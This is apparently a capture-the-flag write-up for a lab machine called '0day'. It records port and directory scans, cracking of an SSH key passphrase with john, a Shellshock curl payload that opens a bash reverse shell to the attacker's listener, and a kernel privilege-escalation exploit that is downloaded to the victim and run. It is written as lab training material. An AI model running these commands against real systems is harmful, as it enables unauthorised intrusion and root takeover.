# 0day **Room Link:** ### Initial Scan **Kali**

nmap -A $VICTIM

### Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

### TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

This appeared to be a rabbit hole but I found a key and was able to bruteforce the password for it.

**Kali** ``` chmod 600 id_rsa /opt/john/ssh2john.py id_rsa > id_john.txt john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt ```

I found a cgi file. i tried checking if it was vulnerable to shellshock which wasn't working but it was vulnerable. **Kali** ``` gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi ```

## Initial Shell **Link:** **Kali#1** ``` nc -lvnp 4242 ``` **Kali #2** ``` curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi ```

Get autocomplete ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` ## Privilege Escalation **Victim** ``` uname -a ```

**Kali** ``` searchsploit 3.13.0 searchsploit -m linux/local/37292.c gcc 37292.c -o exploit python2 -m SimpleHTTPServer 81 ```

The exploit didn't work as it's complaining that it can't create dynamic library **Victim** ``` cd /tmp/ wget http://10.10.91.55:81/exploit chmod +x exploit ./exploit ```

To fix this we just had to export the binpath from the machine **Victim** ``` export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin ./exploit ```